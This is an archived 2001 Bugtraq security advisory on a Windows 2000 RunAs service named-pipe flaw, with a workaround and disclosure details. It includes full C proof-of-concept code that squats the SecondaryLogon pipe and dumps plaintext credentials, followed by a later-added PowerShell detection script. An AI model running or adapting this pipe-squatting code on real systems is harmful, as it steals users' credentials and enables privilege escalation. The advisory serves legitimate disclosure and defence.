Bugtraq mailing list archives

RADIX1112200101


From: research () camisade com
Date: Mon, 12 Nov 2001 22:30:25 +0100

Team RADIX Research Report: RADIX1112200101

Date Published: 11-12-2001 
Research Report ID: RADIX1112200101 
Bugtraq ID: 3185 
CVE CAN: N/A 
Title: RunAs Service Pipe Authentication Failure 
Class: Privilege Escalation and Information Disclosure 
Remotely Exploitable: No 
Locally Exploitable: Yes 

Vulnerability Description: 
The Windows 2000 RunAs service allows a user to launch an application in a security context based upon a supplied set 
of credentials. If the service is ever in a stopped state, an arbitrary local user of the system has the ability to 
recover the plaintext credentials of the RunAs service's users. Additionally, that user may impersonate the security 
context of the RunAs service's clients. 

Vulnerable Systems: Microsoft Windows 2000 

Solution/Vendor Information/Workaround: 
The vendor has decided to include the fix within service pack 3 (SP3). 

According to the vendor, "In February 2002, we will release Windows 2000 Service Pack 3 (SP3)". 

http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp 

When service pack 3 is released, Camisade recommends installing it. 

In the meantime, do not use the RunAs service. However, do not disable the RunAs service. The RADIX1112200101 
vulnerability can only be exploited if the RunAs service is not running: the attacker performs a man-in-the-middle 
attack by standing up a malicious RunAs service in its place. 

Summary: Ensure the RunAs service is in its default setting (automatically started and running). Leaving the service 
in its default installed state, running but unused, and not setting it to manual (or disabled), is the safest approach 
until service pack 3 is released. As a temporary solution, do not use any utilities that leverage the RunAs service. 
This includes the RunAs command line utility and Explorer's RunAs functionality. 

Vendor notified on: 09-10-2001 

The vendor was notified, and confirmed receipt, approximately two months ago. In keeping with the Camisade Research 
Report Policy, the information has been made public to best benefit the security community through full disclosure. 

Credits: 
Camisade - Team RADIX (research () camisade com) http://www.camisade.com 

This advisory was drafted with the help of the SecurityFocus.com Vulnerability Help Team. For more information or 
assistance drafting advisories please mail vulnhelp () securityfocus com. 

Technical Description - Proof of Concept Code: 
The Windows 2000 API CreateProcessWithLogonW leverages the RunAs service to authenticate and launch an application 
requested by the user, in a distinct security context, based on the credentials supplied. Consequently, that API must 
send highly sensitive data to the RunAs service in order to launch that application. However, the API performs no 
validation of the server's identity prior to sending the credentials. 

If the RunAs service is ever in a stopped state, an arbitrary user may usurp its named pipe communication channel 
"\\.\pipe\secondarylogon". The user's malicious application would then be capable of stealing credentials of the users 
of the RunAs service, because the credentials are sent in plaintext. Additionally, the application is capable of 
impersonating the clients' security context throughout the system in an effort to escalate privileges. 

In light of issues such as these, Microsoft created the native API NtSecureConnectPort for sending highly sensitive 
data via the LPC subsystem. Unfortunately, there is no standard API, provided by Microsoft, for deterministically 
connecting to a pipe based on a supplied SID. 


// radix1112200101.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>
#include <stdio.h>

#define MAX_IN_BUF   0x1000
#define MAX_OUT_BUF  0x4
#define MAX_INST     0xA

// Name of the pipe the Secondary Logon (RunAs) service listens on.
// Pipe names are not case sensitive.
#define SECONDARY_LOGON_PIPE  _T("\\\\.\\pipe\\SecondaryLogon")


int main(void)
{
   HANDLE hPipe;

   // Create the server end of the pipe. This only succeeds while the
   // real service is stopped and the name is free.
   hPipe = CreateNamedPipe(SECONDARY_LOGON_PIPE, PIPE_ACCESS_DUPLEX, 
      PIPE_TYPE_BYTE|PIPE_WAIT, MAX_INST, MAX_OUT_BUF, MAX_IN_BUF, 
      NMPWAIT_USE_DEFAULT_WAIT, 0);

   if (hPipe == INVALID_HANDLE_VALUE)
   {
      printf("Can't create secondary logon pipe.  Error %lu\n", GetLastError());
      return 1;
   }

   printf("Created pipe and waiting for clients...\n");
   if (ConnectNamedPipe(hPipe, 0))
   {
      UCHAR InBuf[MAX_IN_BUF];
      DWORD dwReadCount;
      DWORD dwPos;
      DWORD dwReply;
      DWORD dwWroteCount;

      // Each request from CreateProcessWithLogonW arrives as one write.
      while (ReadFile(hPipe, InBuf, MAX_IN_BUF, &dwReadCount, 0))
      {
         printf("Read %lu bytes.  (ASCII Dump)\n", dwReadCount);

         for (dwPos = 0; dwPos < dwReadCount; dwPos++)
         {
            printf("%c ", InBuf[dwPos]);

            // Break the dump into rows of 16 bytes.
            if ((dwPos % 16) == 15)
               printf("\n");
         }
         printf("\n");

         // Answer with an error status so the client simply fails.
         dwReply = ERROR_ACCESS_DENIED;
         WriteFile(hPipe, &dwReply, sizeof(DWORD), &dwWroteCount, 0);
      }
   }
   DisconnectNamedPipe(hPipe);
   CloseHandle(hPipe);
   return 0;
}
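As an added defensive check, not part of the Camisade advisory or its proof of concept, the PowerShell below (for 
current Windows versions) looks for the two conditions the text describes: the SecondaryLogon pipe name being taken 
while the seclogon service is stopped, and the process on the server end of the pipe not being the service. It connects 
with Identification-level impersonation only and never writes to the pipe. The function name and output fields are 
our own; GetNamedPipeServerProcessId is a kernel32 API that did not exist on Windows 2000.

```powershell
# Added example, not from the advisory: verify who serves \\.\pipe\SecondaryLogon.
Add-Type -Namespace Win32 -Name Pipe -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetNamedPipeServerProcessId(IntPtr hPipe, out uint serverPid);
'@

function Test-SecondaryLogonPipe {
    $svc = Get-CimInstance Win32_Service -Filter "Name='seclogon'"
    $pipeExists = [System.IO.Directory]::GetFiles('\\.\pipe\') -contains '\\.\pipe\SecondaryLogon'
    $result = [pscustomobject]@{ ServiceState = $svc.State; ServicePid = $svc.ProcessId
                                 ServerPid = $null; Verdict = $null }
    if (-not $pipeExists) {
        $result.Verdict = 'NoPipe'      # nothing is listening under the RunAs name
        return $result
    }
    if ($svc.State -ne 'Running') {
        # The name is taken while the service is stopped: the squatting
        # condition the advisory describes. Alert, and send nothing to it.
        $result.Verdict = 'PipeWithoutService'
        return $result
    }
    # Identification-level impersonation means even a rogue server could not
    # act under our token; we only use the handle to ask who owns the other end.
    $client = New-Object System.IO.Pipes.NamedPipeClientStream('.', 'SecondaryLogon',
        [System.IO.Pipes.PipeDirection]::InOut, [System.IO.Pipes.PipeOptions]::None,
        [System.Security.Principal.TokenImpersonationLevel]::Identification)
    try {
        $client.Connect(2000)
        [uint32]$serverPid = 0
        $ok = [Win32.Pipe]::GetNamedPipeServerProcessId(
            $client.SafePipeHandle.DangerousGetHandle(), [ref]$serverPid)
        if ($ok) { $result.ServerPid = $serverPid }
        # Trusted only if the server end belongs to the seclogon service process.
        $result.Verdict = if ($ok -and $serverPid -eq $svc.ProcessId) { 'Trusted' }
                          else { 'UnexpectedServer' }
    } catch [System.TimeoutException] {
        $result.Verdict = 'ConnectTimeout'
    } finally {
        $client.Dispose()
    }
    return $result
}

Test-SecondaryLogonPipe | Format-List
```

Any verdict other than Trusted or NoPipe is worth an alert; PipeWithoutService in particular is the state the workaround section tells administrators to avoid.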


-- 
Team RADIX -- Camisade LLC
http://www.camisade.com
Application Security Innovations
Camisade Direct: 1.800.709.1241

